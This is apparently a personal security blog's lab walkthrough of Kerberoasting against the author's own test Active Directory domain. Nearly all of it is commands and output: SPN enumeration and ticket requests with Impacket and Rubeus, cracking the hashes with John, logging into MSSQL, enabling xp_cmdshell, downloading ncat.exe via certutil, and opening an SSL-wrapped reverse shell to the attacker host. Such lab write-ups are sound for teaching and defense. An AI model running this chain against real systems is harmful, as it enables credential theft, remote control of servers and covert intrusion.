In Kerberoasting, we are leveraging the fact that the requested ticket, is encrypted with the password of the service account for which that service is using. Therefore, the objective is to request a ticket for that service and then crack the service account passwords so that the service's credential can be reused.
First up, using the account from the ASP-REQ Roasting post which was just completed, querying the domain for SPN's using impacket-GetUserSPNS.
┌──(rootđź’€securitynik)-[~/packets] └─# impacket-GetUserSPNs securitynik.local/neysa:Testing1 -target-domain SECURITYNIK.LOCAL Impacket v0.9.24.dev1+20210928.152630.ff7c521a - Copyright 2021 SecureAuth Corporation ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation --------------------------------------- ---------------- -------- -------------------------- -------------------------- ---------- cifs/cifs.securitynik.local cifs-service 2021-11-10 21:33:08.377237 <never> HTTP/http.securitynik.local:80 http-spn 2021-11-08 21:32:04.867511 <never> HTTP/http http-spn 2021-11-08 21:32:04.867511 <never> HTTP/http.securitynik.local http-spn 2021-11-08 21:32:04.867511 <never> HTTP/www.securitynik.local kerberos-service 2021-10-22 22:34:26.733216 <never> MSSQLSvc/dc-2019.securitynik.local:1433 sql-service 2021-11-16 04:58:08.706286 2021-11-16 17:30:56.779153
Requesting a Service Ticket for the account with MSSQLSvc/dc-2019.securitynik.local:1433.
┌──(rootđź’€securitynik)-[~/packets] └─# impacket-GetUserSPNs securitynik.local/neysa:Testing1 -target-domain SECURITYNIK.LOCAL -request -outputfile GetUserSPNs.hashes
Leveraging Rubeus to grab the tickets instead from a Windows host.
C:\Tools>Rubeus.exe kerberoast /domain:securitynik.local /outfile:kerberoasting.hashes ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v1.6.4 [*] Action: Kerberoasting [*] NOTICE: AES hashes will be returned for AES-enabled accounts. [*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts. [*] Target Domain : securitynik.local [*] Searching path 'LDAP://securitynik.local/DC=securitynik,DC=local' for Kerberoastable users [*] Total kerberoastable users : 4 [*] SamAccountName : cifs-service [*] DistinguishedName : CN=cifs Service,OU=SecurityNik-Users,DC=securitynik,DC=local [*] ServicePrincipalName : cifs/cifs.securitynik.local [*] PwdLastSet : 11/11/2021 2:33:08 AM [*] Supported ETypes : RC4_HMAC_DEFAULT [*] Hash written to C:\Tools\kerberoasting.hashes [*] SamAccountName : http-spn [*] DistinguishedName : CN=HTTP SPN,OU=SecurityNik-Users,DC=securitynik,DC=local [*] ServicePrincipalName : HTTP/http.securitynik.local:80 [*] PwdLastSet : 11/9/2021 2:32:04 AM [*] Supported ETypes : RC4_HMAC_DEFAULT [*] Hash written to C:\Tools\kerberoasting.hashes [*] SamAccountName : kerberos-service [*] DistinguishedName : CN=Kerberos Service,CN=Users,DC=securitynik,DC=local [*] ServicePrincipalName : HTTP/www.securitynik.local [*] PwdLastSet : 10/23/2021 2:34:26 AM [*] Supported ETypes : AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96 [*] Hash written to C:\Tools\kerberoasting.hashes [*] SamAccountName : sql-service [*] DistinguishedName : CN=SERVICE,OU=SecurityNik-Users,DC=securitynik,DC=local [*] ServicePrincipalName : MSSQLSvc/dc-2019.securitynik.local:1433 [*] PwdLastSet : 11/16/2021 9:58:08 AM [*] Supported ETypes : RC4_HMAC_DEFAULT [*] Hash written to C:\Tools\kerberoasting.hashes [*] Roasted hashes written to : C:\Tools\kerberoasting.hashes
Now that we have the hashes from two different tools, I will take the one from Impacket-GetUserSPNS and feed that to John.
┌──(rootđź’€securitynik)-[~/packets] └─# john GetUserSPNs.hashes Using default input encoding: UTF-8 Loaded 4 password hashes with 4 different salts (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4]) Will run 2 OpenMP threads Proceeding with single, rules:Single Press 'q' or Ctrl-C to abort, almost any other key for status Almost done: Processing the remaining buffered candidate passwords, if any. Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist Testing1 (?) Testing1 (?) Testing1 (?) Testing1 (?) 4g 0:00:00:00 DONE 2/3 (2021-11-17 22:18) 50.00g/s 198400p/s 793600c/s 793600C/s Tara1..Smurfy1 Use the "--show" option to display all of the cracked passwords reliably Session completed
John returned the passwords but I'm not sure why it has the (?).
Leveraging the password Testing1 with username sql-service, against MSSQLSvc/dc-2019.securitynik.local:1433. We need to target the service account which is being used by that SPN. In this case, the service is MSSQL. Let's leverage the Impacket suite once again. This time, using impacket-mssqlclient to target the MSSQL service.
┌──(rootđź’€securitynik)-[~] └─# impacket-mssqlclient securitynik.local/sql-service:Testing1@10.0.0.5 -windows-auth Impacket v0.9.24.dev1+20210928.152630.ff7c521a - Copyright 2021 SecureAuth Corporation [*] Encryption required, switching to TLS [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master [*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(DC-2019\SQLEXPRESS): Line 1: Changed database context to 'master'. [*] INFO(DC-2019\SQLEXPRESS): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server (130 19162) [!] Press help for extra shell commands SQL>
Now that we are in, let's get some help.
SQL> help lcd {path} - changes the current local directory to {path} exit - terminates the server process (and this session) enable_xp_cmdshell - you know what it means disable_xp_cmdshell - you know what it means xp_cmdshell {cmd} - executes cmd using xp_cmdshell sp_start_job {cmd} - executes cmd using the sql server agent (blind) ! {cmd} - executes a local shell cmd SQL>
Let's execute enable_xp_cmdshell.
SQL> enable_xp_cmdshell [*] INFO(DC-2019\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install. [*] INFO(DC-2019\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
Let's now run a few commands
SQL> xp_cmdshell whoami output -------------------------------------------------------------------------------- nt service\mssql$sqlexpress NULL
Running something more meaningful.
SQL> xp_cmdshell net groups "Domain Admins" output -------------------------------------------------------------------------------- Group name Domain Admins Comment Designated administrators of the domain NULL Members NULL ------------------------------------------------------------------------------- 3202357359SA admin Administrator ANGELINE_WHITAKER CARMEN_DURAN DOREEN_MORIN JACKSON_SOSA LOUISA_MCPHERSON MISTY_CALHOUN mysqlsvc The command completed successfully. NULL NULL
That is all interesting so far. Let's get a ncat shell to come back to my attacking machine.
First up, let's setup a webserver to host ncat.exe.
┌──(rootđź’€securitynik)-[~] └─# cd /home/securitynik/WinTools/ ┌──(rootđź’€securitynik)-[~/WinTools] └─# ls ncat.exe ncat.exe ┌──(rootđź’€securitynik)-[~/WinTools] └─# python -m SimpleHTTPServer 80 Serving HTTP on 0.0.0.0 port 80 ...
Using certutil to download ncat.exe.
SQL> xp_cmdshell certutil -URLCache -F http://10.0.0.107/ncat.exe %TEMP%\ncat.exe output -------------------------------------------------------------------------------- **** Online **** CertUtil: -URLCache command completed successfully. NULL
Confirming on our attacking machine, that the file was successfully download.
┌──(rootđź’€securitynik)-[~/WinTools] └─# python -m SimpleHTTPServer 80 Serving HTTP on 0.0.0.0 port 80 ... 10.0.0.5 - - [18/Nov/2021 02:29:41] "GET /ncat.exe HTTP/1.1" 200 - 10.0.0.5 - - [18/Nov/2021 02:29:41] "GET /ncat.exe HTTP/1.1" 200 -
Next, setup a ncat listener on our attacking machine, only allowing the compromised machine to connect. We also are going to take advantage of SSL to hide our activities while blending in.
┌──(rootđź’€securitynik)-[~] └─# ncat --verbose --listen 443 -4 --ssl --allow 10.0.0.5 Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one. Ncat: SHA-1 fingerprint: 881D 3F3D 0CEC 49A2 6A55 E483 902A C0A3 33BF 068F Ncat: Listening on 0.0.0.0:443
Connecting from the compromise machine.
SQL> xp_cmdshell cmd.exe /c "%temp%\ncat.exe 10.0.0.107 443 --ssl --exec cmd.exe"
Looking at the ncat listener, we now have a shell.
┌──(rootđź’€securitynik)-[~] └─# ncat --verbose --listen 443 -4 --ssl --allow 10.0.0.5 Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one. Ncat: SHA-1 fingerprint: 881D 3F3D 0CEC 49A2 6A55 E483 902A C0A3 33BF 068F Ncat: Listening on 0.0.0.0:443 Ncat: Connection from 10.0.0.5. Ncat: Connection from 10.0.0.5:64218. Microsoft Windows [Version 10.0.17763.737] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32>
That is good enough for me. Time to move on. I believe I have improved my knowledge about Kerbeorasting.
References:
No comments:
Post a Comment